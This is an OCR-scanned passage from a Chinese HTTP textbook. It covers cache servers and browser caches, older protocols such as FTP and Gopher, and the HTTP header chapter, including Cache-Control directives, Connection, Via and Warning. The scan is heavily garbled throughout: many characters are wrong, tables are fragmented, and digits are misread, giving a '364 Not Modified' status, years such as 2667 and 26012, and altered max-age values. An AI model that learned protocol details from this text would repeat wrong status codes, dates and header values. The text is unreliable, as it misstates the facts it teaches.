即便 缓存 服务 器 内 有 缓存 ， 也 不 能 保证 每 次 都 会 返回 对 同 资源 的 请 
求 。 因 为 这 关系 到 个 缓存 资源 的 有 效 性 问题 。 

当 过 上 源 服 务 器 上 的 资源 更 新 时 ， 如 果 还 是 使 用 不 变 的 缓存 ， 那 束 会 
演变 成 返回 更 新 前 的 “ 旧 ” 资 源 了 。 

即使 存在 缓存 ， 也 会 因为 客户 端的 要 求 、 缓 存 的 有 效 期 等 因素 ， 同 源 
服务 器 确认 资源 的 有 效 性 。 若 判断 缓存 失效 ， 绥 存 服务 器 将 会 再 次 从 
源 服务 器 上 获取 “新 ”资源 。 





缓存 服务 器 
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这 个 组 存 强 似 过 期 了， 
去 向 : 原 了 服务 器 确认 下 






缓存 服务 器 
上 个 月 的 缓存 本 月 更 新 的 资源 


S.3.2 ”客户 端的 缓存 


缓存 不 仅 可 以 存在 于 缓存 服务 器 内 ， 还 可 以 存在 客户 端 浏览 器 中 。 以 
Internet Explorer 程序 为 例 ， 把 客户 端 缓存 称 为 临时 网 络 文件 
(Temporary Internet File) 。 


浏览 占 缓 存 如 果 有 效 ， 就 不 必 再 同 服务 占 请 求 相同 的 资源 了 ， 可 以 直 
接 从 本 地 磁盘 内 读 取 。 

另外 ， 和 缓存 服务 器 相同 的 一 点 是 ， 当 判定 缓存 过 期 后 ， 会 问 源 服务 
铝 人 确认 资源 的 有 效 性 。 硅 判断 浏览 器 缓存 失效 ， 浏 览 占 会 再 次 请 求 新 
资源 。 

















源 服务 器 
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在 HTTP 出 现 之 前 的 协议 


在 HTTP 普及 之 前 ， 也 就 是 从 互联 网 的 诞生 期 至 今 ， 曾 出 现 过 各 式 
各 样 的 协议 。 在 HTTP 规范 确立 之 际 ， 制 定 者 们 参考 了 那些 协议 的 
功能 。 也 有 茶 些 协议 现在 已 经 彻底 退出 了 人 们 的 视线 。 接 下 来 ,我 
们 会 简单 介绍 一 下 这 些 协 议 。 





FTP (File Transfer Protocol) 


传输 文件 时 使 用 的 协议 。 访 协议 历史 和 久远， 可 退 调 到 1973 年 前 
后 ， 比 TCP/IP 协议 族 的 出 现 还 要 早 。 虽 然 它 在 1995 年 被 HTTP 的 
流量 〈TrafGc) 超越 ， 但 时 至 今日 ， 仍 被 广泛 沿用 。 

NNTP (Network News Transfer Protocol) 


用 于 NetNews 电子 会 议 室 内 传送 消息 的 协议 。 在 1986 年 前 后 出 
现 ， 属 于 比较 古老 的 一 类 协议 。 现 在 ， 利 用 Web 交换 信息 已 成 主 
流 ， 所 以 该 协议 已 经 不 怎么 使 用 了 。 

Archie 


搜索 anonymous FTP 公开 的 文件 信息 的 协议 。1990 年 前 后 出 现 ， 现 
在 已 经 不 常 使 用 。 


WAIS (Wide Area Information Servers) 


以 关键 词 检 索 多 个 数据 库 使 用 的 协议 。1991 年 前 后 出 现 。 由 于 现 
在 已 经 被 HTTP 协议 奉 代 ， 也 已 经 不 怎么 使 用 了 。 





Gopher 


查找 与 互联 网 连接 的 计算 机 内 信息 的 协议 。1991 年 前 后 出 现 ， 由 
于 现在 已 经 被 HTTP 协议 符 代 ， 也 已 经 不 怎么 使 用 了 。 
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第 6 半 HTTP 首部 
HTTP 协议 的 请 求 和 啊 应 报 文中 必定 包含 HTTP 首部 ， 只 是 我 们 平时 


在 使 用 Web 的 过 程 中 感受 不 到 它 。 本 章 我 们 一 起 来 学 习 HTTP 首部 
的 结构 ， 以 及 首部 中 各 字段 的 用 法 。 





6.1 _ HTTP 报 文 首部 









在 客户 端 和 服务 器 处 理 时 
起 至 关 重 要 作用 的 信息 几 
乎 都 在 这 边 









所 需要 的 用 户 和 资源 的 信 
息 都 在 这 边 









图 : HTTP 报 文 的 结构 


HTTP 协议 的 请 求 和 啊 应 报 文中 必定 包含 HTTP 首部 。 首 部 内 容 为 客 
户 端 和 服务 器 分 别处 理 请 求 和 啊 应 提供 所 需要 的 信息 。 对 于 客户 端 用 
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户 来 说 ， 这 些 信息 中 的 大 部 分 内 容 都 无 须 亲 自 查 看 。 
报 文 首部 由 几 个 字段 构成 。 
HTTP 请 求 报 文 


在 请 求 中 ，HTTP 报 文 由 方法 、URI、HTTP 版 本 、HTTP 首部 字段 等 
部 分 构成 。 


Re 方法 、URI、 


了 
请 求 首部 字段 WE 
| 通用 首部 字段 HTTP 首 部 字段 
实体 首部 字段 | 





图 : 请 求 报 文 
下 面 的 示例 是 访问 http://hackr.jp 时 ， 请 求 报 文 的 首部 信息 。 








GET / HTTP/1.1 

Host: hackr.jp 

User-Agent: Mozilla/5.6 (Windows NT 6.1; WOW64; rv:13.0) Ge 
Accept: text/html,application/xhtml+xml,application/xml;q=0 
Accept-Language: ja,en-us;q=0.7,en;dq=0.3 


Accept-Encoding: gzip, deflate 

DNT: 1 

Connection: keep-alive 

If-Modified-Since: Fri, 31 Aug 2667 62:62:20 GMT 
If-None-Match: "45bae1-16a-46d776ac" 
Cache-Control: max-age=0 





HTTP 响应 报 文 


在 啊 应 中 ，HTTP 报 文 由 HTTP 版 本 、 状 态 码 (数字 和 原因 短语 ) 、 
HTTP 首部 字段 3 部 分 构成 。 
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HTTP 版 本 、 
和 和 
、 HTTP 首 部 字段 
| 其 他 | 





图 : 响应 报 文 
以 下 示例 是 之 前 请 求 访问 http://hackr.jp/ 时 ， 返 回 的 响应 报 文 的 首部 
兰 自 


百 /Co 





HTTP/1.1 364 Not Modified 
Date: Thu，67 Jun 26012 67:21:36 GMT 


Server: Apache 
Connection: close 
Etag: "45bae1-16a-46d776ac" 











在 报 文 众多 的 字段 当中 ，HTTP 首部 字段 包含 的 信息 最 为 丰富 。 首 部 
字段 同时 存在 于 请 求 和 响应 报 文 内 ， 并 涵盖 HTTP 报 文 相关 的 内 容 信 


因 HTTP 版 本 或 扩展 规范 的 变化 ， 首 部 字段 可 支持 的 字段 内 容 略 有 不 
同 。 本 书 主要 涉及 HTTP/1.1 及 常用 的 首部 字段 。 


6.2 HTTP 首部 字段 


6.2.1 HTTP 首部 字段 传递 重要 信息 


HTTP 首部 字段 是 构成 HTTP 报 文 的 要 系 之 一 。 在 客户 端 与 服务 器 之 
间 以 HTTP 协议 进行 通信 的 过 程 中 ， 无 论 是 请 求 还 是 啊 应 都 会 使 用 首 
部 字段 ， 它 能 起 到 传递 额外 重要 信息 的 作用 。 


使 用 首部 字段 是 为 了 给 浏览 右 和 服务 器 提供 报 文 主体 大 小 、 所 使 用 的 


语言 、 认 证 信息 等 内 容 。 
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我 是 Apacke 服务 器 ， 你 能 
分 种 后 再 过 来 访问 o9? 


我 正 使 用 曲 这 个 浏览 器 只 能 
理解 中 文 ， 部 请 谅解 ， 








客户 端 


图 : 首部 字段 内 可 使 用 的 附加 信息 较 多 





6.2.2 HTTP 首部 字段 结构 








HTTP 首部 字段 是 由 首部 字段 名 和 字段 值 构成 的 ， 中 间 用 冒号 “:” 分 
隔 。 


首部 字段 名 : 字段 值 

















例如 ， 在 HTTP 首部 中 以 Content-Type 这 个 字段 来 表示 报 文 主体 的 对 
象 类 型 。 


Content-Type: text/html 


就 以 上 述 示例 来 看 ， 首 部 字段 名 为 Content-Type， 字 符 串 text/html 是 
字段 值 O 


另外 ， 字 段 值 对 应 单个 HITP 首部 字段 可 以 有 多 个 值 ， 如 下 所 示 。 


奇 HTTP 首部 字段 重复 了 会 如 何 


当 HTTP 报 文 首部 中 出 现 了 两 个 或 两 个 以 上 有 具有 相同 首部 字段 名 时 
会 怎么 样 ? 这 种 情况 在 规范 内 尚未 明确 ， 根 据 浏 览 嚣 内 部 处 理 逻 辑 
的 不 同 ， 结 果 可 能 并 不 一 致 。 有 些 浏 览 器 会 优先 处 理 第 一 次 出 现 的 
首部 字段 ， 而 有 些 则 会 优先 处 理 最 后 出 现 的 首部 字段 。 














6.2.3 4 种 HTTP 首部 字段 类 型 
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HTTP 首部 字段 根据 实际 用 途 被 分 为 以 下 4 种 类 型 。 
通用 首部 字段 〈General Header Fields ) 

请 求 报 文 和 啊 应 报 文 两 方 都 会 使 用 的 首部 。 

请 求 首 部 字段 (Request Header Fields) 


从 客户 端 向 服务 器 端 发 送 请 求 报 文 时 使 用 的 首部 。 补 充 了 请 求 的 附加 
内 容 、 客 户 端 信息 、 响 应 内 容 相关 优先 级 等 信息 。 


啊 应 首部 字段 (Response Header Fields) 


从 服务 器 器 同 客户 端 返回 啊 应 报 文 时 使 用 的 首部 。 补 充 了 虽 应 的 附加 
内 容 ， 也 会 要 求 客 尸 端 附加 额外 的 内 容 信息 。 


实体 首部 字段 (Entity Header Fields ) 


针对 请 求 报 文 和 啊 应 报 文 的 实体 部 分 使 用 的 首部 。 补 充 了 资源 内 容 更 
新 时 间 等 与 实体 有 关 的 信息 。 

















6.2.4 HTTP/1.1 首部 字段 一 览 
HTTP/1.1 规范 定义 了 如 下 47 种 首部 字段 。 


表 6-1: 通用 首部 字段 







































































表 6-2: 请 求 首 部 字段 
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Accept 有 户 代理 可 处 理 的 媒体 类 型 


的 字符 
的 内 容 编 码 




















的 电子 邮箱 地 址 

















户 
请 求 资源 所 在 服务 器 






































围 请 求 
Referer 对 请 求 中 URI 的 原始 获取 方 


传输 编码 的 优先 级 


Agent HTTP 客户 端 程序 的 信息 














首部 字段 名 
Accept-Ranges 是 否 接受 字 节 范围 请 求 
推算 资源 创建 经 过 时 间 







































































\ 理 服务 器 缓存 的 管理 信 


WWW-Authenticate | 服务 器 对 客户 端的 认证 信息 
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表 6-4: 实体 首部 字段 








实体 主体 的 自然 语言 
实体 主体 的 大 小 (单位 ， 字 节 ) 
替代 对 应 资源 的 URI 


























实体 主体 的 媒体 类 型 
Expires | 实体 主体 过 期 的 日 期 时 间 
Last-Modified 。 | 资源 的 最 后 修改 日 期 时 间 


6.2.S 非 HTTP/1.1 首部 字段 






































在 HTTP 协议 通信 交互 中 使 用 到 的 首部 字段 ， 不 限于 RFC2616 中 定 
义 的 47 种 首部 字段 。 还 有 Cookie、Set-Cookie 和 Content-Disposition 
等 在 其 他 RFC 中 定义 的 首部 字段 ， 它 们 的 使 用 频率 也 很 高 。 





这 些 非 正 式 的 首部 字段 统一 归纳 在 RFC4229 HTTP Header Field 
Registrations 中 。 


6.2.6 ”End-to-end 首部 和 Hop-by-hop 首部 


人 首部 字段 将 定义 成 缓存 代理 和 非 缓存 代理 的 行为 ， 分 成 2 种 类 
型 ， 


端 到 端 首部 (End-to-end Header) 











分 在 此 类 别 中 的 首部 会 转发 给 请 求 / 啊 应 对 应 的 最 终 接收 目标 ， 且 必 
须 保 存在 由 缓存 生成 的 啊 应 中 ， 夯 外 规定 它 必 须 被 转发 。 


逐 跳 首部 〈Hop-by-hop Header) 





分 在 此 类 别 中 的 首部 只 对 单 次 转发 有 效 ， 会 因 通 过 缓存 或 代理 而 不 再 
转发 。HTTP/1.1 和 之 后 版 本 中 ， 如 果 要 使 用 hop-by-hop 首部 ， 需 提 
供 Connection 首部 字段 。 
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下 面 列举 了 HTTP/1.1 中 的 逐 跳 首部 字段 。 除 这 8 个 首部 字段 之 外 ， 
其 他 所 有 字段 都 属于 端 到 端 首部 。 


Connection 


Keep-Alive 


Proxy-Authenticate 


Proxy-Authorization 


Trailer 


e TE 


Transfer-Encoding 


e Upgrade 


6.3 HTTP/1.1 通用 首部 字段 


通用 首部 字段 是 指 ， 请 求 报 文 和 响应 报 文 双方 都 会 使 用 的 首部 。 





0.3.1 Cache-Control 





ee 首部 字段 Cache-Control 的 指令 ， 束 能 操作 缓存 的 工作 机 
制 |。 





如 果 有 新 绢 存 请 给 我 









缓存 服务 器 


我 希望 你 不 于 对 此 做 
绎 夯 Pp 
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图 : 首部 字段 Cache-Control 能 够 控制 缓存 的 行为 


指令 的 参数 是 可 选 的 ， 多 个 指令 之 间 通 过 “,” 分 隔 。 首 部 字段 Cache- 
Control 的 指令 可 用 于 请 求 及 啊 应 时 。 


。Cache-Control 指令 一 览 
可 用 的 指令 按 请 求 和 响应 分 类 如 下 所 示 。 
表 6-5: 绥 存 请 求 指令 








a 强制 向 源 服务 器 再 次 验证 
no-store ee 不 缓存 请 求 或 响应 的 任何 内 容 
max-age = [ 和 响应 的 最 大 Age 值 
略 “ | 接收 已 过 期 的 响应 















































en 


| 二 | 个 下 人 
CR | 天 | 从 到 
ers | 


表 6-6: 缓存 响应 指令 


不 缓存 请 求 或 响应 的 任何 内 容 




































































a DR 响应 有 效 性 再 
进行 确认 


max-age = [ 秒 ] 响应 的 最 大 Age 值 
s-maxage =[ 秒 ] Se 
TT | ea 














proxy-revalidate 
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表示 是 否 能 缓存 的 指令 


public 指令 
当 指 定 使 用 public 指令 时 ， 则 明确 表明 其 他 用 户 也 可 利用 缓存 。 


private 指令 









这 份 绿 存 日 可 以 
提供 给 那个 家 亿 





缓存 服务 器 源 服务 器 











Cache-Control: private 


当 指 定 private 指令 后 ， 啊 应 只 以 特定 的 用 户 作为 对 象 ， 这 与 public 
指令 的 行为 相反 。 


绥 存 服务 器 会 对 该 特定 用 户 提供 资源 缓存 的 服务 ， 对 于 其 他 用 户 发 送 
过 来 的 请 求 ， 代 理 服务 器 则 不 会 返回 缓存 。 


no-cache 指令 


客户 端的 角度 









我 不 要 绥 存 过 由 ， 
请 给 我 从 源 最 务 器 
那里 拿 来 的 资源 









客户 端 缓存 服务 器 


你 可 以 组 在 ， 但 每 次 使 用 
前 记得 先 向 我 确认 一 下 





服务 器 的 角度 
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Cache-Control: no-cache 


使 用 no-cache 指令 的 目的 是 为 了 防止 从 缓存 中 返回 过 期 的 资源 。 


客户 端 发 送 的 请 求 中 如 果 包 售 no-cache 指令 ， 则 表示 客户 端 将 不 会 接 
收 缓存 过 的 啊 应 。 于 是 ,，“ 中 间 ” 的 缓存 服务 器 必须 把 客户 端 请 求 转发 
给 源 服务 器 。 

如 果 服 务 器 返回 的 响应 中 包含 no-cache 指令 ， 那 么 缓存 服务 器 不 能 对 
资源 进行 缓存 。 源 服务 器 以 后 也 将 不 再 对 缓存 服务 器 请 求 中 提出 的 资 
源 有 效 性 进行 确认 ， 且 禁止 其 对 啊 应 资源 进行 缓存 操作 。 


Cache-Control: no-cache=Location 


由 服务 器 返回 的 啊 应 中 ， 知 报 文 首部 字段 Cache-Control 中 对 no-cache 
字段 名 具体 指定 参数 值 ， 那 么 客户 端 在 接收 到 这 个 被 指定 参数 值 的 首 
部 字段 对 应 的 啊 应 报 文 后 ， 就 不 能 使 用 缓存 。 换 言 之 ， 无 参数 值 的 首 
部 字段 可 以 使 用 缓存 。 只 能 在 啊 应 指令 中 指定 该 参数 。 


控制 可 执行 缓存 的 对 象 的 指令 


no-store 指令 











Cache-Control: no-store 








当 使 用 no-store 指令 工时， 暗示 请 求 《和 对 应 的 响应 ) 或 响应 中 包含 
机 密 信 息 。 

1 从 字面 意思 上 很 容易 把 no-cache 误解 成 为 不 缓存 ， 但 事实 上 no-cache 代表 不 组 
存 过 期 的 资源 ， 绥 存 会 癌 源 服务 器 进行 有 效 期 确认 后 处 理 资源 ， 也 许 称 为 do-not- 
serve-from-cache-without-revalidation 更 合适 。no-store 才 是 真正 地 不 进行 缓存 ， 请 
读者 注意 区 别 理解 。 一 一 译 者 注 

因此 ， 该 指令 规定 缓存 不 能 在 本 地 存储 请 求 或 啊 应 的 任 一 部 分 。 


指定 缓存 期 限 和 认证 的 指令 












































s-maxage 指令 


Cache-Control: s-maxage=6648868 (单位 : 秒 ) 
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s-maxage 指令 的 功能 和 max-age 指令 的 相同 ， 它 们 的 不 同 点 是 s- 

maxage 指令 只 适用 于 供 多 位 用 户 使 用 的 公共 缓存 服务 器 “。 也 就 是 

对 于 同 同一 用 户 重 复 返 回 啊 应 的 服务 器 来 襄 ， 这 个 指令 没有 任何 
用 。 


2 这 里 一 般 指 代理 。 一 一 译 者 注 


另外 ， 当 使 用 s-maxage 指令 后 ， 则 直接 急 略 对 Expires 首部 字段 及 
max-age 指令 的 处 理 。 


max-age 指令 


客户 端的 角度 






客户 疹 缓存 服务 器 





一 周 内 不 从 再 向 我 确认 ， 
你 直接 支配 该 组 有 存 好 了 





Cache-Control: max-age=664868 (单位 : 秒 ) 


当 客 户 端 发 送 的 请 求 中 包含 max-age 指令 时 ， 如 果 判 定 缓存 资源 的 组 
存 时 间 数 值 比 指定 时 间 的 数值 更 小 ， 那 么 客户 端 就 接收 缓存 的 资源 。 

另外 ， 当 指定 max-age 值 为 0， 那么 缓存 服务 器 通常 需要 将 请 求 转发 
给 源 服务 器 。 


当 服 务 器 返回 的 响应 中 包含 max-age 指令 时 ， 缓 存 服务 器 将 不 对 资源 
的 有 效 性 再 作 确 认 ， 而 max-age 数值 代表 资源 保存 为 缓存 的 最 长 时 
间 。 


应 用 HTTP/1.1 版 本 的 缓存 服务 器 遇 到 同时 存在 Expires 首部 字段 的 情 
况 时 ， 会 优先 处 理 max-age 指令 ， 而 忽略 掉 Expires 首部 字段 。 而 
HTTP/1.0 版 本 的 缓存 服务 器 的 情况 却 相 反 ，max-age 指令 会 被 忽略 
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掉 。 


min-fresh 指令 


Cache-Control: min-fresh=66 (单位 : 秒 ) 





min-fresh 指令 要 求 缓存 服务 占 返 回 至 少 还 未 过 指定 时 间 的 缓存 资源 。 


比如 ， 当 指定 min-fresh 为 60 秒 后 ， 过 了 60 秒 的 资源 都 无 法 作为 啊 
应 返回 了 。 


max-stale 指令 


Cache-Control: max-stale=3666 (单位 : 秒 ) 
使 用 max-stale 可 指示 绥 存 资源 ， 即 使 过 期 也 照 向 接收 。 


如 果 指 令 未 指定 参数 值 ， 那 么 无 论 经 过 多 久 ， 客 户 端 都 会 接收 啊 应 ; 
如 果 指 令 中 指定 了 具体 数值 ， 那 么 即使 过 期 ， 只 要 仍 处 于 max-stale 
指定 的 时 间 内 ， 仍 旧 会 被 客户 端 接 收 。 


only-if-cached 指令 


Cache-Control: only-if-cached 


使 用 only-if-cached 指令 表示 客户 病 仪 在 缓存 服务 器 本 地 绥 存 目标 资 
源 的 情况 下 才 会 要 求 其 返回 。 换 言 之 ， 该 指令 要 求 缓存 服务 器 不 重新 
加 载 啊 应 ， 也 不 会 再 次 确认 资源 有 效 性 。 大 发 生 请 求 缓存 服务 器 的 本 
地 缓存 无 啊 应 ， 则 返回 状态 码 504 Gateway Timeout。 





must-revalidate 指令 


Cache-Control: must-revalidate 


使 用 must-revalidate 指令 ， 代 理会 癌 源 服务 器 再 次 验证 即将 返回 的 啊 
应 绥 存 目前 是 否 仍 然 有 效 。 


若 代 理 无 法 连通 源 服 务 器 再 次 获取 有 效 资源 的 话 ， 绥 存 必 须 给 客户 端 
一 条 504 (Gateway Timeout) 状态 码 。 


另外 ， 使 用 must-revalidate 指令 会 忽略 请 求 的 max-stale 指令 (即使 已 
经 在 首部 使 用 了 max-stale， 也 不 会 再 有 效果 ) 。 








proxy-revalidate 指令 


Cache-Control: proxy-revalidate 


proxy-revalidate 指令 要 求 所 有 的 缓存 服务 器 在 接收 到 客户 端 带 有 该 指 
令 的 请 求 返 回 啊 应 之 前 ， 必 须 再 次 验证 缓存 的 有 效 性 。 


no-transform 指令 


Cache-Control: no-transform 








使 用 no-transform 指令 规定 无 论 是 在 请 求 还 是 啊 应 中 ， 绥 存 都 不 能 改 
变 实 体 主 体 的 媒体 类 型 。 


这 样 做 可 防止 缓存 或 代理 压缩 图 片 等 类 似 操作 。 
Cache-Control 扩展 


cache-extension token 


Cache-Control: private, community="UCI" 


通过 cache-extension 标记 (token) ， 可 以 扩展 Cache-Control 首部 字 
段 内 的 指令 。 


如 上 例 ，Cache-Control 首部 字段 本 里 没有 community 这 个 指令 。 借 助 
extension tokens 实现 了 该 指令 的 添加 。 如 果 绥 存 服务 器 不 能 理解 
community 这 个 新 指令 ， 就 会 直接 忽略 。 因 此 ，extension tokens 仅 对 
能 理解 它 的 缓存 服务 器 来 说 是 有 意义 的 。 
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0.3.2 ” Connection 

Connection 首部 字段 有 具备 如 下 两 个 作用 。 
。 控制 不 再 转发 给 代理 的 首部 字段 
。 管理 持久 连接 


。 控制 不 再 转发 给 代理 的 首部 字段 


GET / HTTP/1.1 GET / HTTP/1.1 


Upgrade: HTTP/1.1 i ; , 
Connection: Upgrade 首部 字段 Upgrade 被 删除 后 再 转发 





源 服 务 器 











Connection: 不 再 转发 的 首部 字段 名 
在 客户 端 发 送 请 求 和 服务 吉 返 回 啊 应 内 ， 使 用 Connection 首部 字 
段 ， 可 控制 不 再 转发 给 代理 的 首部 字段 〈 即 Hop-by-hop 首 
部 ) 。 
e。 管理 持久 连接 


Connection close 





这 下 我 和 你 曲 关 系 
暂且 结束 3 


Connection: cjlose 
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HTTP/1.1 版 本 的 默认 连接 都 是 持久 连接 。 为 此 ， 客 户 端 会 在 持 
久 连 接 上 连续 发 送 请 求 。 当 服务 器 端 想 明 确 断 开 连 接 时 ， 则 指定 
Connection 首部 字段 的 值 为 Close。 


|) GBT HTTP/LET 
Connection: Keep-Alive 





客户 端 75) HTTP/1.1 200 OK 


Keep-Alive: timeout=10, max=500 
Connection: Keep-Alive 





Connection: Keep-Alive 


HTTP/1.1 之 前 的 HITP 版 本 的 默认 连接 都 是 非 持久 连接 。 为 
此 ， 如 果 想 在 旧版 本 的 HITP 协议 上 维持 持续 连接 ， 则 需要 指定 
Connection 首部 字段 的 值 为 Keep-Alive。 


如 上 图 (WD 所 示 ， 客 户 端 发 送 请 求 给 服务 器 时 ， 服 务 器 端 会 像 上 图 


@ 那 样 加 上 首部 字段 Keep-Alive 及 首部 字段 Connection 后 返回 
响应 。 


6.3.3 Date 


首部 字段 Date 表明 创建 HITP 报 文 的 日 期 和 时 间 。 






HTTP 报 文 创 建 于 2012 
年 7 月 3 日 (周二 >4 点 


40 分 59 种 





HTTP/1.1 协议 使 用 在 RFC1123 中 规定 的 日 期 时 间 的 格式 ， 如 下 示 


例 。 
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Date: Tue，63 Jul 2612 64:46:59 GMT 


之 前 的 HTTP 协议 版 本 中 使 用 在 RFC850 中 定义 的 格式 ， 如 下 所 示 。 


Date: Tue, 83-Jul-12 64:46:59 GMT 


除 此 之 外 ， 还 有 一 种 格式 。 它 与 C 标准 库 内 的 asctime() 函数 的 输出 
格式 一 致 。 


Date: Tue Jul 63 64:40:59 2012 





0.3.4 Pragma 


Pragma 是 HTTP/1.1 之 前 版 本 的 历史 遗留 字段 ， 仅 作为 与 HITP/1.0 
的 向 后 兼容 而 定义 。 


规范 定义 的 形式 唯一 ， 如 下 所 示 。 








Pragma: no-cache 


该 首部 字段 属于 通用 首部 字段 ， 但 只 用 在 客户 端 发 送 的 请 求 中 。 客 户 
端 会 要 求 所 有 的 中 间 服 务 器 不 返回 缓存 的 资源 。 


Pragma: no-cache 





中 间 服 务 器 


所 有 的 中 间 服 务 器 如 果 都 能 以 HTTP/1.1 为 基准 ， 那 直接 采用 Cache- 





Control: no-cache 指定 缓存 的 处 理 方 式 是 最 为 理想 的 。 但 要 整体 掌握 
全 部 中 间 服 务 占 使 用 的 HTTP 协议 版 本 却 是 不 现实 的 。 因 此 ， 发 送 的 
请 求 会 同时 含有 下 面 两 个 首部 字段 。 





Cache-Control: no-cache 
Pragma: no-cache 
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0.3.$ Trailer 





在 报 文 的 景 后 写 了 很 
重要 绝 东 西 ， 记 得 要 
仔细 阅读 哦 









首部 字段 Trailer 会 事先 说 明 在 报 文 主体 后 记录 了 哪些 首部 字段 。 该 
首部 字段 可 应 用 在 HTTP/1.1 版 本 分 块 传输 编码 时 。 
HTTP/1.1 200 OK 


Date: Tue, 03 Jul 2012 04:40:56 GMT 
Content-Type: text/html 


Transfer-Encoding: chunked 


Trailer: Expires 


... ( 报 文 主体 ) . . . 
0 


Expires: Tue, 28 Sep 2004 23:59:59 GMT 








以 上 用 例 中 ， 指 定 首 部 字段 Trailer 的 值 为 Expires， 在 报 文 主体 之 后 
(分 块 长 度 0 之 后 ) 出 现 了 首部 字段 Expires。 


0.3.0 Transfer-Encoding 





用 这 种 传输 编码 方式 发 送 哦 


Transfer-Encoding: chunked 
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首部 字段 Transfer-Encoding 规定 了 传输 报 文 主体 时 采用 的 编码 方式 。 
HTTP/1.1 的 传输 编码 方式 仅 对 分 块 传输 编码 有 效 。 


HTTP/1.1 200 OK 

Date: Tue, 03 Jul 2012 04:40:56 GMT 
Cache-Control: public, max-age=604800 
Content-Type: text/jJavascript; charset=utf-8 
Expires: Tue, 10 Jul 2012 04:40:56 GMT 
X-Frame-Options: DENY 

X-XSS-Protection: 1; mode=block 
Content-Encoding: gzip 

Transfer-Encoding: chunked 

Connection: keep-alive 
































cf0 -16 进 制 (10 进 制 为 3312) 


. .3312 字 节 分 块 数据 .. 




















392 16 进 制 (10 进 制 为 914) 


. . 914 字 节 分 块 数据 .. 





以 上 用 例 中 ， 正 如 在 首部 字段 Transfer-Encoding 中 指定 的 那样 ， 有 效 
ee 且 分 别 被 分 成 3312 字 节 和 914 字 节 大 小 的 分 块 
数据 


0.3.7 Upgrade 


首部 字段 Upgrade 用 于 检测 HTTP 协议 及 其 他 协议 是 售 可 使 用 更 高 的 
版 本 进行 通信 ， 其 参数 值 可 以 用 来 指定 一 个 完全 不 同 的 通信 协议 。 










能 让 我 使 用 这 个 协议 o9? 
GET /index.htm HTTP/1.1 
Upgrade: TLS/1.0 
Connection: Upgrade 


HTTP/1.1 101 Switching Protocols 


客户 端 Upgrade: TLS/1.0, HTTP/1.1 
Connection: Upgrade 
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上 图 用 例 中 ， 首 部 字段 Upgrade 指定 的 值 为 TLS/1.0。 请 注意 此 处 两 
个 字段 首部 字段 的 对 应 关系 ，Connection 的 值 被 指定 为 Upgrade。 
Upgrade 首部 字段 产生 作用 的 Upgrade 对 象 仪 限于 客户 并 和 邻接 服务 
器 之 间 。 因 此 ， 使 用 首部 字段 Upgrade 时 ， 还 需要 额外 指定 
Connection:Upgrade。 


对 于 附 有 首部 字段 Upgrade 的 请 求 ， 服 务 器 可 用 101 Switching 
Protocols 状态 码 作为 啊 应 返回 。 





0.3.8 Via 


使 用 首部 字段 Via 是 为 了 追踪 客户 问 与 服务 器 之 间 的 请 求 和 啊 应 报 文 
的 传输 路 径 。 

报 文 经 过 代理 或 网 关 时 ， 会 先 在 首部 字段 Via 中 附加 该 服务 器 的 信 
息 ， 然 后 再 进行 转发 。 这 个 做 法 和 traceroute 及 电子 邮件 的 Received 
首部 的 工作 机 制 很 类 似 。 


首部 字段 Via 不 仅 用 于 追 踩 报 文 的 转发 ， 还 可 避免 请 求 回 环 的 发 生 。 
所 以 必须 在 经 过 代理 时 附加 该 首部 字段 内 容 。 


GET / HTTP/13:I 


2 GET / HTTP/1.1 
Via: 1.0 gw.hackr.jp( Squid/3.1) 











各 个 代理 服务 器 会 往 Via 首 部 添加 自 
身 服务 器 的 信息 。 


源 服务 药 





上 图 用 例 中 ， 在 经 过 代理 服务 器 A 时 ，Via 首部 附加 了 “1.0 
gw.hackr.jp (Squid/3.1)” 这 样 的 字符 串 值 。 行 头 的 1.0 是 指 接收 请 求 的 
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服务 器 上 应 用 的 HITP 协议 版 本 。 接 下 来 经 过 代理 服务 器 B 时 亦 是 如 
此 ， 在 Via 首部 附加 服务 器 信息 ， 也 可 增加 1 个 新 的 Via 首部 写 入 服 
务 器 信息 。 


Via 首部 是 为 了 追踪 传输 路 笃 ， 所 以 经 常会 和 和 TRACE 方法 一 起 使 
用 。 比 如 ， 代 理 服务 器 接收 到 由 TRACE 方法 发 送 过 来 的 请 求 〈 其 中 
Max-Forwards: 0) 时 ， 代 理 服 务 器 就 不 能 再 转发 该 请 求 了 。 这 种 情况 
0 0 
Yo 














6.3.9 Warning 


HTTP/1.1 的 Warning 首部 是 从 HTTP/1.0 的 响应 首部 (Retry-After) 演 





变 过 来 的 。 该 首部 通常 会 告知 用 户 一 些 与 缓存 相关 的 问题 的 警告 。 


Warning: 113 gw.hackr.jp:8686 "Heuristic expiration” Tue, 0 





Warning 首部 的 格式 如 下 。 最 后 的 日 期 时 间 部 分 可 省 略 。 


Warning: [警告 码 ][ 警 告 的 主机 :端口 号 ]“[ 警 告 内 容 ]”([ 日 期 时 间 ]) 














HTTP/1.1 中 定义 了 7 种 警告 。 警 告 码 对 应 的 警告 内 容 仅 推荐 参考 。 
另外 ， 警 告 码 具 备 扩展 性 ， 今 后 有 可 能 追加 新 的 警告 码 。 


表 6-7: HTTP/1.1 警告 码 


Response is stale 〈 响 应 已 过 期 ) 代理 返回 已 过 期 的 资源 
31 \ 


Revalidation failgd《〈 再 验证 失败 ) 1 
Disconnection operation〈 断 开 连 接 操 代理 与 互联 网 连接 被 故意 切断 
作 ) 





















































的 设 定时 间 大 于 24 小 时 的 情况 下 ) 


Miscellaneous Warning (杂项 警告 ) 任意 的 警告 内 容 


Transformation appled《〈 使 用 了 转换 ) 1 0 了 
































Miscellaneous persistent warning (持久 任意 的 警告 内 容 
杂项 警告 ) /区 、\ 言 吕 合 





a 四 期 超 雯 E 效 组 
Heuristic expiration 〈 试 探 性 过 期 ) 应 的 使 用 期 超过 24 小 时 有效 缓存 
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6.4 请求 首 部 字段 


请 求 首部 字段 是 从 客户 端 往 服务 器 兹 发 送 请 求 报 文中 所 使 用 的 字段 ， 
用 于 补充 请 求 的 内 加 信息 、 客 户 端 信息 、 对 响应 内 容 相关 的 优先 级 等 
容 。 
















我 村 发 送 过 来 3 哦 


服务 器 


图 : HTTP 请求 报 文 中 使 用 的 首部 字段 


0.4.1 Accept 










那 份 资源 景 好 发 给 我 HTML 
烙 式 的， 如 果 没 有 ， 发 给 我 


TEXT 属 式 的 也 行 啊 
Accept: text/plain; q=0.3, text/htm 
5 


HTML 格 式 









为 
HTML 格 式 TEXT 格式 


Accept 首部 字段 可 通知 服务 器 ， 用 户 代理 能 够 处 理 的 媒体 类 型 及 媒体 
